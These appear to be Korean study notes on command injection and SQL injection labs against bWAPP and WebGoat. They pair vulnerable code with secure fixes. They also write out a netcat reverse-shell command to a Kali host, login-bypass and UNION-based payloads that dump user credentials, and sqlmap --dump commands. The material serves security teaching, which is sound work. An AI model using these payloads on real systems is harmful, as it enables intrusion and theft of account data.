kali에서 bee box로 들어갈 수 없으면 내부에서 외부로 나오도록 해줘야 한다. bee box 서버 관리하는 사람이 있다면 그 사람이 8282 서버에 연결할 수 있는 nc kali.linux 8282 -e /bin/bash를 입력해 주면 간단하게 해결되지만, 해당 서버 관리하는 사람을 알지 못한다면 해당 서버에서 명령어는 입력하지 못한다. 그렇다면 다음으로는 어떻게 해야 할까?

위에서 추가 명령어를 사용했을 때 봤듯이 bee box 웹 서버에서 쉘 명령어를 이용해 검색해 주는 서비스를 보았다. 이것을 이용하면 사람이 없어도 쉘 명령어를 사용할 수 있게 된다.

kali에서 연결을 생성하는 명령어를 웹 서버에 전달하면 웹 서버는 쉘 명령어로 인식하고 쉘 명령어를 실행해 쉘은 8282 서버에 연결해 주는 것이다. 그러면 내부에서 내부로 나가게 되는 것이다.

이 공격을 하기 위한 전제 조건은 bee box에 nc라는 명령어가 존재하기 때문에 가능하다. nc가 없는 경우도 있는데, 없으면 어떻게 할지 알아본다.

4) 텔넷을 이용한 리터스 커넥션

위에서는 nc를 통해 8282 서버에 쉘 명령어 출력을 보냈지만, 이번에는 9292로 출력한다.

(1) kali 가상머신에 두 개의 서비스 실행

• nc -l -p 8282
• nc -l -p 9292

두 개의 터미널을 열고 각각 실행한다.

(2) 취약점을 가진 웹 페이지

취약점을 가진 OS Command Injection 페이지에 텔넷으로 연결하는 명령어를 작성한다.

5) 취약점 소스 코드 확인

sudo gedit /var/www/bWAP/commandi.php

bee box에서 commandi.php를 확인한다.

문제가 되는 부분은 140번 줄이다.

"<p align=\\"left\\"><pre>" . shell\_exec("nslookup  " . commandi($target)) . "</pre></p>";

shell_exec 설명은 이곳으로 대체한다.

쉘을 실행하고 commandi함수를 호출한다. 

function commandi($data)            
{
    switch($_COOKIE["security_level"])
    {
        case "0" :
            $data = no_check($data);
            break;

        case "1" :
            $data = commandi_check_1($data);
            break;

        case "2" :
            $data = commandi_check_2($data);
            break;

        default :
            $data = no_check($data);
            break;
    }

    return $data;
}

function commandi_check_1($data)            
{
    $input = str_replace("&", "", $data);        
    $input = str_replace(";", "", $input);
    return $input;
}

function commandi_check_2($data)
{
    return escapeshellcmd($data);        
}

호출한 commandi 함수는 보안 등급에 따라 입력값을 필터링해서 반환하는 함수다.

밑에 있는 commandi_check_1 함수는 functions_external.php 파일에 정의되어 있는 함수다. 편의상, 같이 적었다.

위 두 함수를 보면 shell_exec는 commandi 함수를 호출하는데 매개변수로 입력값을 전달한다.

이때 commandi 함수는 보안 등급에 따라 입력값을 필터링하는데 기본 설정이 no_check이므로 Injection이 되는 것이다.

check_1 함수를 보면 운영체제 명령어 뒤에 추가 명령어를 사용할 수 있게 하는 & 또는 ; 이 포함되어 있으면 제거하고 반환한다.

escapeshellcmd 설명은 이곳으로 대체한다.

이렇게 OS Command Injection 실습은 이렇게 실행하는 데 shell_exec 함수를 사용하는데 외부에서 입력된 문자를 check 함수가 검증, 제한하지 않아서 문제가 된다.

 (1) 파일 오픈

불필요한 운영체제 명령어를 실행해서 파일 내용을 반환하는 게 아니라 파일을 오픈해서 내용을 반환하는 방법을 사용하는 게 더 안전한 방법이다.

파이썬으로 운영체제 명령어를 실행하는 코드를 실습한다.

• help.py - 불필요한 운영체제 명령어 실행

import subprocess
import sys 

# return <file_path>'s contents using cat command 
def return_file_contents(file_path):
    try:
        contents = subprocess.run(['cat', file_path], capture_output=True, text=True, check=True)
                  return contents.stdout    
    except subprocess.CalledProcessError as e:
        print(f"Error: {e}")
        sys.exit(1)


if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usages: python help.py <file_path>")
        sys.exit(1)

    file_path = sys.argv[1]
    file_contents = return_file_contents(file_path)
    print(file_contents)

• 파일 오픈 방법으로 변경

import subprocess
import sys 

# return <file_path>'s contents using cat command 
def return_file_contents(file_path):
    with open(file_path, 'r') as f:
        return f.read()

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usages: python help.py <file_path>")
        sys.exit(1)

    file_path = sys.argv[1]
    file_contents = return_file_contents(file_path)
    print(file_contents)

Injection Flaws > LAB: SQL Injection > Stage 1 : String SQL Injection

• 목표는 Neville 사용자로 로그인하는 것 

1) 로그인 버튼을 클릭했을 때 서버로 전달되는 내용 분석(GET 방식)

attack?Screen=18&menu=1100&employee_id=112&password=입력한패스워드&action=Login

<form id="form1" name="form1" method="post" action="attack?Screen=18&amp;menu=1100">
    <label>
        <select name="employee_id">
            <option value="101">Larry Stooge (employee)</option>
            <option value="102">Moe Stooge (manager)</option>
            <option value="103">Curly Stooge (employee)</option>
            <option value="104">Eric Walker (employee)</option>
            <option value="105">Tom Cat (employee)</option>
            <option value="106">Jerry Mouse (hr)</option>
            <option value="107">David Giambi (manager)</option>
            <option value="108">Bruce McGuirre (employee)</option>
            <option value="109">Sean Livingston (employee)</option>
            <option value="110">Joanne McDougal (hr)</option>
            <option value="111">John Wayne (admin)</option>
            <option value="112">Neville Bartholomew (admin)</option>
        </select>
    </label>
    <br>
    <label>
        Password
        <input name="password" type="password" size="10" maxlength="8">
    </label>
    <br>
    <input type="submit" name="action" value="Login">
</form>

2) 요청 파라미터를 이용한 쿼리문 유추

SELECT * FROM users WHERE id = 112 and pw = '입력한 패스워드'

• 일치하는 결과가 존재하면 로그인 성공

3) 유추한 쿼리의 일치하는 결과가 항상 존재하도록 수정

SELECT * FROM users WHERE id = 112 and pw = a' or 'a' = 'a

• a는 의미 없는 값
• or 'a' = 'a는 항상 참이 되는 값

4) maxlength = 8

코드에서 보면 Password는 최대 길이가 8로 제한되어 공격이 이루어지지 않는다 .

maxlength = 8을 우회하는 방법을 생각해야 한다.

(1) 개발자 도구를 이용해 길이 제한을 해제

(2) 프록시 도구를 이용해 요청 데이터를 변조해서 전달

• 인터셉터 설정

• 로그인 요청

• 인터셉터 된 내용에서 요청 파라미터를 공격 문자열을 포함하도록 변조 후 전달

• 로그인 성공

5) 문제점

(1) 사이트의 문제점

• 입력값 검증 부재

로그인 화면에서 입력값의 길이를 제한했으면, 서버에서도 입력값의 길이를 검증해야 하지만, 하지 않음

• SQL Injection

입력값에 쿼리 조작 문자열 포함 여부를 확인하지 않고 쿼리문 생성 및 실행에 사용

(2) 취약한 소스코드 확인 

Ctrl + Shift + R > Login.java 실행

Ctrl + Shift + F를 눌러 자동으로 코드 내용을 문법 템플릿에 맞게 포매팅(들여쓰기)한다.

108번 줄 public boolean login 함수 안에 있는 문구 중 113번 줄, 116~118번 줄을 본다.

• 113번 줄

String query = "SELECT * FROM employee WHERE userid = " + userId + " 
and password = '" + password + "'";

• 외부 입력값을 쿼리 조각 문자열 포함 여부를 확인하지 않고 문자열 결합 방식으로 쿼리문 생성에 사용

• 116번 줄

Statement answer_statement = WebSession.getConnection(s).createStatement(
    ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
ResultSet answer_results = answer_statement.executeQuery(query);

• Statement 객체를 이용해서 쿼리를 실행

(3) 소스 코드 문제점

• SQL Injection

해당 소스 코드는 Statement 객체를 이용해서 쿼리를 실행하고 있는데, 외부 입력값을 쿼리 조작 문자열 포함 여부를 확인하지 않고 문자열 결합 방식으로 쿼리문 생성에 사용하므로, 외부 입력값에 의해서 쿼리의 구조와 내용이 변형되어 실행될 수 있다.

6) 안전한 소스코드로 수정

(1) 113번 줄

• 쿼리의 구조를 정의

String query = "SELECT * FROM employee WHERE userid = ? and password = ? ";

(2) 116번 줄

• PreparedStatement 객체 생성

PreparedStatement answer_statement = WebSession.getConnection(s) 
.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, 
ResultSet.CONCUR_READ_ONLY);

answer_statement.setInt(1, Integer.parseInt(userId));
answer_statement.setString(2, password);
ResultSet answer_results = answer_statement.executeQuery();

• 변수에 값 전달 후 쿼리 실행

2. Numeric SQL Injection

LAB: SQL Injection > Stage 3: Numeric SQL Injection

• 목표는 Larry 사용자로 로그인해서 Neville 사용자의 프로필을 보는 것
• Larry의 패스워드는 larry, Neville의 사번은 112
• Larry는 employee 권한을 가지고 있으므로, 본인 프로파일만 열람 가능

1) 개발자 도구 또는 Proxy 도구 이용 employee_id 값 변경

• 오류 발생

데이터 레이어에서의 접근 통제가 구현되어 있어 다른 사용자의 아이디로 요청하면 오류 발생

2) 취약한 소스코드 확인

Ctrl + Shift + R > ViewProfile.java 실행
Ctrl + Shift + F 자동 포매팅

87번 줄 public Employee getEmployeeProfile 함수 안에 있는 문구 중 92번 줄, 97번 줄을 본다.

(1) 92번 줄

String query = "SELECT employee.* " + "FROM employee, ownership
    WHERE employee.userid = ownership.employee_id and " +
    "ownership.employer_id = " + userId + " 
    and ownership.employee_id = " + subjectUserId;

• 정확한 테이블 확인
• employee : 직원 테이블
• ownership : 권한 테이블 (어떤 직원이 어떤 직원을 조회할 수 있는지 정보를 가지고 있는 테이블)
• userId : 조회를 요청하는 직원 ID, Larry
  • 로그인한 사용자의 정보를 담고 있는 세션으로부터 추출
  • 서버의 세션 정보를 이용하므로 변조할 수 없음
• subjectUserId : 조회 대상 직원 ID, Neville
  • 사용자 화면에서 요청 파라미터로 전달된 값 
  • 전달되는 과정에서 변조 가능
  • 모든 데이터를 조회하고, 공격자가 조회하려고 하는 데이터가 처음에 위치하도록 쿼리를 작성
  • 로그인 화면에서 Neville 사용자의 사번이 가장 큰 것을 이용
  • 101 or 1 = 1 order by employee_id desc

(2) 97번 줄

Statement answer_statement = WebSession.getConnection(s) .createStatement(
    ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
ResultSet answer_results = answer_statement.executeQuery(query);
if (answer_results.next())

• 조회 결과 데이터의 맨 처음 데이터를 읽어서 출력

3) 개발자 도구 이용 공격 문자열 전달

101 or 1 = 1 order by employee_id desc

4) 결과 확인

5) 안전한 소스코드로 수정

(1) 92번 줄

• 쿼리 구조 정의

String query = "SELECT employee.* " + "FROM employee,ownership
    WHERE employee.userid = ownership.employee_id and " +
    "ownership.employer_id = ? and ownership.employee_id = ? ";

(2) 97번 줄

• PreparedStatement 객체 생성

PreparedStatement answer_statement = WebSession.getConnection(s) 
    .prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, 
    ResultSet.CONCUR_READ_ONLY);

• 변수에 값을 맵핑하고 쿼리 실행

answer_statement.setInt(1, Integer.parseInt(userId));
answer_statement.setInt(2, Integer.parseInt(subjectUserId));
ResultSet answer_results = answer_statement.executeQuery();

executeQuery()에 있는 query는 위에서 객체를 생성할 때 이미 넘겨 주었기 때문에 빼줘야 한다.

3. UNION Based SQL Injection

Kali에서 bee.box/bWAPP 접속 후 SQL Injection (GET/Search)

• 목표는 서비스에 등록된 모든 사용자의 계정 정보 탈취

1) 서버 전달 내용 유추

• man 입력
• http://bwapp/sqli_1.php?title=man&action=search

<form action="/bWAPP/sqli_1.php" method="GET">
        <p>
            <label for="title">Search for a movie:</label>
            <input type="text" id="title" name="title" size="25">
            <button type="submit" name="action" value="search">Search</button>
        </p>    
</form>

2) 내부 쿼리문 유추

SELECT * FROM movies WHERE title like '%man%'

• 조건과 일치하는 데이터를 조회해서 출력

3) 오류 유발

• 사용자 화면에서 입력한 값이 서버로 전달되어 내부 처리 과정에서 입력값을 검증 및 제한 하는지 확인
• 오류를 일부러 유발

SELECT * FROM moives WHERE title like '%man'%'

'를 입력함으로써 앞부분까지는 제목이 man으로 끝나는 데이터를 조회하지만, 뒤 %'가 알 수 없는 내용으로 구문 오류 발생

• 구문 오류로 나온 오류 메시지를 통해 정보 획득
• 해당 서비스의 데이터베이스는 MySQL
• 입력값을 검증, 제한 하지 않고 그대로 쿼리문 생성 및 실행에 사용
• 인젝션 가능

4) 쿼리문 변조

SELECT * FROM movies WHERE title like '%man' UNION 공격자가 원하는 데이터 조회 쿼리 -- %'

앞부터 man'까지는 서비스 쿼리의 실행 결과다. 목표는 공격자가 원하는 데이터 조회 쿼리는 만드는 것이다.

--는 인라인 주석으로 위에서 %' 때문에 구문 오류가 발생한 것을 --를 사용함으로 %' 주석처리 해 공격자가 사용한 쿼리에서 문장이 끝나도록 만들었다.

(1) UNION

• 쿼리의 결과를 하나로 합쳐주는 역할
• 두 쿼리의 실행 결과가 동일한 컬럼 개수를 가져야 함
• 두 쿼리의 실행 결과의 각 컬럼의 데이터 타입이 호환할 수 있어야 함
• 쿼리의 실행 결과로 반환되는 컬럼의 개수와 데이터 타입을 확인해야 사용 가능

(2) 컬럼 개수 확인

SELECT * FROM movies WHERE title like '%man' or 'a' = 'a' order by 1 -- %'
SELECT * FROM movies WHERE title like '%man' or 'a' = 'a' order by 2 -- %'
SELECT * FROM movies WHERE title like '%man' or 'a' = 'a' order by 3 -- %'

모든 데이터를 조회하고, 조회 결과를 첫 번째 컬럼의 값을 기준으로 정렬하는 쿼리문이다.

컬럼의 기준값을 바꿔가면서 컬럼의 개수가 몇 개인지 확인한다.

8까지 입력하면 에러가 발생하는 것을 볼 수 있다. 그러므로 컬럼의 개수는 7개이다.

(3) 컬럼의 데이터 타입과 관계없이 결합 가능하도록 쿼리 수정

select * from movies where title like '%man' and 'a' = 'b' -- %'

• 항상 거짓이 되는 조건 추가
• 조회 결과 없음
• 아무 데이터 타입과 결합 가능

(4) 컬럼이 어느 위치에 출력되는지 확인

select * from movies where title like '%man' and 'a' = 'b'
UNION select 1, 2, 3, 4, 5, 6, 7 -- %'

서비스 쿼리가 반환하는 7개 컬럼 중 4개의 컬럼만 화면 출력에 사용하고 있다.

(5) 버전 정보 출력

select * from movies where title like '%man' and 'a' = 'b' 
UNION select 1, @@version, 3, 4, 5, 6, 7 -- %'

버전 정보를 입력함으로 쿼리문이 잘 작동하는지 확인한다.

(6) 시스템 테이블을 이용해 원하는 정보 조회

• 시스템 스키마 테이블
• 시스템 테이블 테이블
• 시스템 컬럼 테이블

select * from movies where title like '%man' and 'a' = 'b' UNION select 1, 
    table_name, table_type, 4, 5, 6, 7 from information_schema.tables -- %'

시스템 테이블을 이용해 테이블 이름과 타입을 확인한다.

(7) 사용자 정보가 있을 것 같은 테이블의 컬럼 정보 조회

select * from movies where title like '%man' and 'a' = 'b' 
UNION select 1, table_name, column_name, 4, 5, 6, 7 
from information_schema.columns where table_name = 'users' -- %'

(8) users 테이블의 id, login, password, email, secret 컬럼의 정보 조회

select * from movies where title like '%man' and 'a' = 'b' 
UNION select 1, concat(id, ' : ', login), password, email, secret, 6, 7 from users -- %'

(9) 패스워드 크래킹

패스워드 크래킹

• 안전하지 않은 해시 함수 사용하는 경우, 쉽게 원문을 추출할 수 있음

(10) 사용자 계정 

1. A.I.M / bug
2. bee / bug

5) 취약한 소스코드 확인

bee.box > var > www > bWAPP > sqli_1.php

<?php

include("security.php");
include("security_level_check.php");
include("selections.php");
include("functions_external.php");      // ⇐ 보안 등급별로 실행될 함수를 정의하고 있는 파일
include("connect.php");

function sqli($data){

    switch($_COOKIE["security_level"]) 
    // ⇐ 사용자 화면에서 설정한 보안 등급(쿠키에 저장되어 있음)에 따라 동작
    {
        case "0" : // ⇐ 낮은 보안 등급이 설정되면 취약한 함수가 호출
            $data = no_check($data); 
            // ⇐ 매개 변수로 전달한 값을 그대로 반환 = 입력값이 그대로 사용되는 구조

            break;

        case "1" :
            $data = sqli_check_1($data); 
            // ⇐ 높은 보안 등급은 매개 변수에서 문제가 되는 부분을 제거하는 기능을 구현

            break;

        case "2" :
            $data = sqli_check_2($data);

            break;

        default :
            $data = no_check($data);

            break;

    }

    return $data;

}

?>

// ... 화면 구성 ...

<div id="main">

    <h1>SQL Injection (GET/Search)</h1>
    <form action="<?php echo($_SERVER["SCRIPT_NAME"]); ?>" method="GET">
          // ⇐ 문제 부분 사용자가 입력한 값을 현재 페이지로 다시 호출하는 구조
        <p>             
        <label for="title">Search for a movie:</label>
        <input type="text" id="title" name="title" size="25">
        <button type="submit" name="action" value="search">Search</button>
           // ⇐  버튼을 클릭하면 action 이름으로 search라는 값을 전달
        </p>
    </form>
    <table id="table_yellow">
        <tr height="30" bgcolor="#ffb717" align="center">
            <td width="200"><b>Title</b></td>
            <td width="80"><b>Release</b></td>
            <td width="140"><b>Character</b></td>
            <td width="80"><b>Genre</b></td>
            <td width="80"><b>IMDb</b></td>
        </tr>
<?php

if(isset($_GET["title"])) 
//  ⇐ 제목을 입력하고 search 버튼을 클릭해서 온 요청인지를 판단
{
    $title = $_GET["title"];
    $sql = "SELECT * FROM movies WHERE title LIKE '%" . sqli($title) . "%'";
                                                     // ~~~~~~~~~~~~~~~~              
    $recordset = mysql_query($sql, $link);          //  문자열 결합 방식으로 쿼리문을 생성  
                                                   //   보안 등급별 함수 호출 결과를 이용
    if(!$recordset)             // ⇐ 오류가 발생하는 경우 
    {
        // die("Error: " . mysql_error());
?>
        <tr height="50">
            <td colspan="5" width="580"><?php die("Error: " . mysql_error()); ?></td>
        </tr>
<?php
    }

    if(mysql_num_rows($recordset) != 0)           // ⇐ 조회 결과가 있는 경우 
    {
        while($row = mysql_fetch_array($recordset))         
        {
?>
        <tr height="30">
            <td><?php echo $row["title"]; ?></td>
            <td align="center"><?php echo $row["release_year"]; ?></td>
            <td><?php echo $row["main_character"]; ?></td>
            <td align="center"><?php echo $row["genre"]; ?></td>
            <td align="center"><a href="http://www.imdb.com/title/<?php echo $row["imdb"]; ?>
            " target="_blank">Link</a></td>
        </tr>
<?php
        }
    }
    else // ⇐ 조회 결과가 없는 경우 
    {
?>
        <tr height="30">
            <td colspan="5" width="580">No movies were found!</td>
        </tr>
<?php
    }
    mysql_close($link);         // ⇐ 데이터베이스 연결을 종료
}
else                   // ⇐ 메뉴를 통해서 호출되는 경우 → 조회 결과 없이 기능을 제공 
{
?>
        <tr height="30">
            <td colspan="5" width="580"></td>
        </tr>
<?php
}
?>
    </table>
</div>
// ... 공통 부분 ...

(1) functions_external.php 파일에 no_check(), sqli_check_1(), sqli_check_2() 함수 확인

function no_check($data){    
    return $data;             //  ⇐ 매개변수 값을 그대로 반환 
}                            //      → 쿼리 조작 문자열이 포함되어 있어도 그대로 사용되게 됨

function sqli_check_1($data){
    return addslashes($data);    
}

function sqli_check_2($data){
    return mysql_real_escape_string($data);
}

• addslashes 함수 
• mysql_real_escape_string 함수 

6) sqlmap 이용 공격

sudo apt install -y sqlmap

sqlmap을 설치하고 cookie 값을 확인한다.

(1) 데이터베이스 목록 조회

sqlmap -u http://bee.box/bWAPP/sqli_1.php?title=man --cookie="PHPSESSID=e14488ec3e84895e039f1f6d0f1f2d1f; security_level=0" --dbs

• login.php 페이지로 리다이렉트된다는 메시지가 나오는 경우 다시 로그인한 후 쿠키값을 재 설정해서 실행

• 테이블 확인
• DBMS 확인
• 데이터베이스 목록 확인

(2) bWAPP 데이터베이스가 가지고 있는 테이블 정보를 조회

sqlmap -u http://bee.box/bWAPP/sqli_1.php?title=man --cookie="PHPSESSID=e14488ec3e84895e039f1f6d0f1f2d1f; security_level=0" -D bWAPP --tables

(3) users 테이블의 컬럼 정보를 조회

sqlmap -u http://bee.box/bWAPP/sqli_1.php?title=man --cookie="PHPSESSID=e14488ec3e84895e039f1f6d0f1f2d1f; security_level=0" -D bWAPP -T users --columns

(4) users 테이블의 데이터를 조회

sqlmap -u http://bee.box/bWAPP/sqli_1.php?title=man --cookie="PHPSESSID=e14488ec3e84895e039f1f6d0f1f2d1f; security_level=0" -D bWAPP -T users --dump

• 몇 개의 명령어로 SQL Injection 공격에 취약한 사이트의 사용자 정보를 해시 크래킹해서 조회 가능

프로그램 입력값에 대한 검증 누락 또는 부적절한 검증, 데이터의 잘못된 형식 지정, 일관되지 않은 언어셋 사용 등으로 인해 발생하는 보안 약점으로 SQL 삽입, 크로스사이트 스크립트(XSS)  등의 공격을 유발할 수 있다.

1) 입력값 검증이 필요한 이유

프로그램은 입력, 처리, 출력이 순서로 반복되는 것이다.

프로그램을 안전하게 만들기 위해서는 처리 단계에서 안전한 처리가 이루어져야 한다. 안전한 처리란 개발자가 의도한 대로 동작해야 안전한 처리가 이루어진다.

처리만 개발자의 의도대로 동작한다고 안전해지는 것은 아니다. 입력 또한 신뢰할 수 있는 입력을 받아야 한다. 믿을 수 있는 시스템 내부의 값 같은 안전한 곳으로부터 전달된 입력은 신뢰할 수 있는 입력이지만, 믿을 수 없는 사용자가 입력한 값(사용자가 잘못 입력하거나 전달 과정에서 변조될 수 있음) 같은 안전하지 않은 곳으로부터 전달된 입력은 신뢰할 수 없는 입력이다.

안전한 처리를 하기 위해서는 신뢰할 수 있는 입력값을 사용하고, 신뢰할 수 없는 입력값을 사용해야 하는 경우, 입력값을 검증, 제한해서 사용해야 한다.

2. 인젝션(Injection, 삽입) 취약점

어떤 처리가 있을 때, 입력값에 처리를 조작할 수 있는 문자열 포함 여부를 확인하지 않고 처리에 사용하는 경우
처리의 구조와 의미가 변형되어 원래 의도했던 처리와 다르게 처리되는 문제점

1) 유형

• SQL Injection
  • 입력값이 SQL 문을 만들고 실행하는데 사용
• XPath Injection
  • 입력값이 XPath 구문을 만들고 실행하는데 사용
• XQuery Injection
  • 입력값이 XQuery 구문을 만들고 실행하는데 사용
• Command Injection
  • 입력값이 운영체제 명령어 또는 명령어의 일부로 사용

2) 방어

• 입력값에 처리를 조작하는 문자열 포함 여부를 확인하고 사용 - 입력값 검증, 제한
• 입력값에 처리를 조작하는 문자열이 포함된 경우
  1. 오류 처리
  2. 제거하고 사용
  3. 처리를 조작하는 문자열을 일반 문자열로 해석되도록 변경해서 사용 - 이스케이프 처리
• 각 기능에서 제공하는 안전한 방법을 사용
• 구조를 정의하고 정의된 구조에 입력값을 검증된 기능을 통해서 대입하는 방식으로 구현
• 구조화된 쿼리 실행, 파라미터화된 쿼리 실행

제거하고 사용하는 것은 문제가 될 수 있다. 사용자가 어떤 영향을 미치는지 모르고 실제 그 문장을 찾고자 입력했을 수도 있다 제거하고 사용하는 것은 사용자의 의도를 무시하는 수가 있다. 사용자가 100% 공격자는 아니다.

3. SQL Injection

외부 입력값에 쿼리 조작 문자열 포함 여부를 확인하지 않고, 쿼리문(SQL문)을 생성, 실행하는데 사용하는 경우
원래 의도했던 쿼리의 구조와 내용이 변경되어 실행되는 것

1) 예상되는 문제점

• 권한 밖 DB 데이터에 접근이 가능
• 쿼리 실행을 통해서 제공되는 기능을 비정상적으로 제공받는 것이 가능
  • 해당 기능을 우회해서 이용하는 것이 가능

2) 예시

(1) 정상적인 입력인 경우 동작

               login.do?id=abc&pw=xyz
ID : abc  ----------------------------------->  select * from users where id = 'abc' and pw = 'xzy'
PW: xyz

• 일치하는 정보가 있는 경우 로그인에 성공하고 메인 페이지를 반환
• 일치하는 정보가 없는 경우 오류 메시지와 함께 로그인 페이지를 반환

ID 입력을 abc, PW 입력을 xyz로 했을 때 GET 방식으로 보면 위와 같이 전달되고, 서버에서 확인할 때 SQL 문이 위와 같이 생성되어 확인한다.

(2) 비정상적인 입력인 경우 동작

             login.do?id=abc&pw=xyz' or 'a' = 'a
ID: abc  ---------------------------------------------->  select * from users where id = 'abc' and pw = 'xzy' or 'a' = 'a'
PW: xyz' or 'a' = 'a

• 원래는 users 테이블에 id, pw 컬럼의 값이 일치하는 것이 있는지 조회하는 쿼리
• 조작된 입력값에 의해 항상 참인 쿼리로 변경되어서 실행

일치하는 정보가 있는 것으로 판단해서 메인 페이지를 반환하게 된다. 

(3) 데이터베이스가 동작하는 서버의 제어권을 탈취해 원격에서 해당 서버를 제어하는 것이 가능

OWASP TOP10

OWASPTOP10은 웹 애플리케이션에서 가장 빈번하고 많이 발생하는 취약점들을 1~10위로 정리해서 발표하는 것이다. 

위 링크를 보면 2017년에서 Injection이 1등이었고, 이전에도 항상 상위권을 지키고 있다.

3) 방어 기법

파이썬에서 SQL Injection을 방어하는 방법

• 입력값에 쿼리 조작 문자열 포함 여부를 확인하고 사용

  • 오류 처리
  • 제거하고 사용
  • 안전한 형태로 변경해서 사용

• PreparedStatement(Query Parameters)와 같은 구조화된 쿼리 실행(파라미터화된 쿼리 실행)을 보장하는 것을 사용 

• 오류 메시지에 상세한 내용(데이터베이스 및 쿼리 구조, 쿼리 실행과 관련한 프로그램 구조 등)이 포함되지 않도록 처리

• 애플리케이션에서 사용하는 DB 사용자의 권한을 필요한 만큼의 최소한으로 부여

밑에 두 개는 SQL Injection 공격을 완화하기 위해서 필요한 방어 기법

4. WebGoat 실습

Injection Flaws > String SQL Injection

• 입력한 사용자 이름과 일치하는 계좌 정보를 반환해 주는 웹 페이지
• 목표는 모든 사용자의 계좌 정보가 출력되게 하는 것

1) 정상적인 입력

Smith를 입력하면 나오는 화면이다. 정상적으로 출력이 되는데, 내부적으로 어떻게 처리가 되는지, 화면에서 입력된 값이 서버로 어떻게 전달되고 어떻게 사용되는지 유추해야 한다.

2) 개발자 도구를 이용해 서버로 전달되는 내용 분석

개발자 도구를 이용하면 action을 통해 어디로 가는지, method를 통해 어떤 방식으로 전달하는지, 어떤 내용들을 전달하는지 알 수 있다.

위 소스 코드는 POST 방식이므로 요청 본문에 들어가야 하는데 편의상 GET 방식으로 유추한다.

attack?Screen=34&menu=1100&account_name=Smith&SUBMIT=Go! 

Smith가 어디에 들어가는지 봐야 한다.

3) 서버에서 처리 유추

요청 파라미터로 전달된 값이 어떻게 사용되는지 유추

특정 테이블에 데이터를 조회하는 쿼리를 만들고 실행하는 데 사용할 것이라고 유추한다. 

WebGoat에서 준 힌트로 유추할 수 있다.

SELECT * FROM user_data WHERE last_name = 'Smith'

4) 모든 사용자 데이터를 조회하는 쿼리 생성

입력값이 서버에서 검증 없이 그대로 쿼리를 만드는 데 사용된다면 모든 사용자 데이터를 조회하는 쿼리를 어떻게 만들어야 하는지 생각해야 한다. 

SELECT * FROM user_data WHERE last_name = 'Smith' or 'a' = 'a' 

위와 같이 입력하면 항상 참이 되는 조건을 추가하는 것이다. 모든 데이터를 조회할 때는 항상 참이 되도록 만들어 주면 된다.

5) 쿼리 조작 문자열 포함해서 요청

외부 입력값을 쿼리 조작 문자열(' = or) 포함 여부를 확인하지 않고 그대로 쿼리 생성 및 실행에 사용해서 쿼리의 원래 의미(이름이 일치하는 데이터를 조회해서 반환)를 변경(모든 데이터를 조회)해서 실행

5. Numeric SQL Injection

Injection Flaws > Numeric SQL Injection

1) 정상적인 동작

• Columbia를 선택하면 101이 station 파라미터 값으로 전달

2) 개발자 도구 이용해서 소스 코드 분석

<select name="station"><option value="101">Columbia</option>

3) 서버로 전달되는 값(GET 방식으로) 유추

attack?Screen=44&menu=1100&station=101&SUBMIT=Go!

4) 서버에서 요청으로 전달된 값을 쿼리를 생성하고 실행하는 데 사용(힌트)

SELECT * FROM weather_data WHERE station = 101

5) 모든 데이트를 조회하는 쿼리

SELECT * FROM weather_data WHERE station = 101 or 1 = 1

항상 참이 되는 조건을 추가하는데 원래 쿼리의 형태를 고려해서 추가해야 한다.

6) 방법

(1) 개발자 도구를 이용

• 서버로 전달되는 값을 조작

입력창이 아니므로 값을 직접 입력하는 것이 불가능하므로 개발자 도구를 이용해 Columbia가 선택되었을 때 서버로 전달되는 값을 조작한다.

(2) Proxy 이용

• Intercept 설정

• 요청 발생

• 인터셉터 된 요청의 내용(요청 파라미터의 값)을 변조한 후 인터셉터를 해제

변조된 요청이 서버로 전달

7) 모든 데이터 조회 확인

6. 입력값 검증의 중요성

인젝션을 통해 조회된 결과의 지역과 지역 선택 창에 나오는 지역이 다르다. 전체 지역은 6개지만, 서비스로 제공하는 지역은 4개만 제공하기 때문이다.

1) 입력창(text, textarea)과, 라디오 버튼, 체크 박스, 셀렉트 박스의 차이

• 입력창
  • 사용자가 자유롭게 입력
• 라디오 버튼, 체크 박스, 셀렉트 박스
  • 시스템에서 제공하는 범위 내에서 선택하도록 제한

2) 문제점

서비스로 제공하는 4개 지역만 선택하도록 제한하기 위해서 셀렉트 박스를 사용했지만, 서버에서는 해당 범위의 값이 전달되었는지 확인해야 하나 하지 않았기 때문에 문제가 발생

3) 보완

클라이언트 사이드에 적용된 보안 기능은 서버 사이드에도 동일하게 또는 더 높은 보안 기능을 적용해야 함

select * from members where id =  

• 사용자가 입력한 ID와 일치하는 회원 정보를 조회해서 제공

이러한 구조를 가졌을 때 인젝션이 발생하는 입력의 유형을 본다.

1) 에러를 유발하는 입력

Error Based SQL Injection

• 입력값으로 에러를 유발하는 값을 전달
• 생성된 에러 메시지를 통해서 정보를 수집하고 수집한 정보를 이용해서 추가 공격을 계획

(1) 예시

select * from members where id = 123'

• ID 컬럼은 숫자 형으로 문자열 데이터를 받을 수 없고, 작은따옴표의 개수가 일치하지 않아서 오류 발생

2) 항상 참이 되는 입력

• 쿼리문의 조건식의 결과가 항상 참이 되게 만드는 입력
• 권한 밖의 데이터에 접근, 조회하는 것이 가능
• 모든 데이터 조회 가능

(1) 예시

select * from members where id = 123 or 1 = 1

• 입력값이 항상 참
• 인젝션이 걸리는 컬럼의 데이터 타입에 맞춰 작은따옴표를 추가 해야 함
• members 테이블의 모든 데이터 조회 가능

3) UNION 구문을 이용

Union Based SQL Injection

• 원래 서비스를 통해서 실행되는 쿼리에 공격자가 알고자 하는 정보를 조회하는 쿼리를 UNION 구문을 이용해서 결합하여 실행
• UNION 구문은 두 쿼리의 실행 결과를 하나로 결합함
• 공격자가 알고자 하는 정보가 함께 출력

(1) 예시

select * from members id = 123        정상 입력으로 123 회원의 데이터가 조회되어 출력

select * from members id = 123 and 1 = 2 UNION select 1, 2, 3, 4 from 어떤테이블

• 1, 2, 3, 4가 출력
• and 1 = 2는 정상 쿼리의 실행 결과가 없도록 만드는 구문
• UNION 구문은 공격자가 알고자 하는 정보를 조회하는 쿼리
  • 시스템에 어떤 쿼리가 있는지 알 수 없으므로 시스템 테이블을 우선적으로 활용

4) Stored Procedure를 호출하는 입력

